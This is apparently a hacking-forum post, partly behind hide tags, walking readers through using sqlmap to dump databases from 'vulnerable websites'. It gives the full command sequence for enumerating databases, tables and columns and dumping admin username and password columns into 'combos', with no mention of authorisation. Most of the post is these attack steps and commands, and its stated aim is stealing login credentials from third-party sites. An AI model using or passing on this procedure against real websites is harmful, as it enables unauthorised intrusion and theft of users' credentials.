Show support for a more advanced tutorial ++ I'm not going to waste my time if people just leech. The tutorial is inside hide tags to keep the thread active.
[hide]
Simple compact tutorial:
- Execute SQLMap directory - CD C:\python27\sqlmap (depending where you placed)
- Execute vulnerability scanner - sqlmap.py -u <URL>
- Execute database scan - sqlmap.py -u <URL> --dbs
- Get access to database you want - sqlmap.py -u <URL> --tables -D <database name>
- Pull columns of the tables - sqlmap.py -u <URL> -columns -T <table name>
- Dump data of columns - sqlmap.py -u <URL> --columns -T <table name> -C <column names> (serperate by commas EG: a_username,a_password) --dump
- Locate file, open and there are your combos
Tutorial /w pictures and explanations
Step one: Installation
I will not explain this in depth, you will be running a python file so please install version 2 https://www.python.org/ftp/python/2.7.9/python-2.7.9.msi
It should create a folder inside your C:\ drive called python27, this is needed for later.
Next download SQLMap https://github.com/sqlmapproject/sqlmap/zipball/master(RENAME IT SQLMAP!) and put this inside the python27 folder so the path is C:\Python27\sqlmap
Step two: Opening the python file for basic help
Open CMD and type CD C:\python27\sqlmap
Ok, we are now in the sqlmap directory! Type sqlmap.py -h for details about all the functions in sqlmap.
Step three: Scanning!
Ok, now it gets good, for this to work you already need to have a vulnerable website. Type:
sqlmap.py -u VULN
If it worked you will see something like this
Step four: Idk let's just carry on.
Next we have to identify there databases, press the UP arrow will load the last executed command and press space and then --dbs
and then dada! We have pulled the database.
Now we have to access it which is super dooper easy! Press the Up arrow and delete --dbs and type --tables -D and then the database you want.
So? What did we just do? --tables tells sqlmap we are looking for tables and -D (MUST BE CAPITAL!) tells sqlmap we want to open that database.
If it all goes to plan it should look like this.
Now we have to open the tables for columns!
Press UP arrow, delete --tables and replace it with --columns which tells the user we want to open columns then type -T (CAPITAL!) and then the table you want to open! We are going for user
ass so a_admins seems like a good start? full code:
Just like before we should see another table this been a_admins only
We see two things of interested, db_username and db_password, next tast is to pull and then dump these into a file.
Once again press the UP arrow and simply add -C database,database replacing them with the ones you want and then --dump at the end, this is telling sqlmap we want to access both of these columns and then dump them into a file which creates our combos!
That's it guys, a basic guide on how to dump databases super fast compared to other programs! I suggest reading up on parameters such as --threads=10 and risk / level values. But this will do for this tutorial.
[/hide]
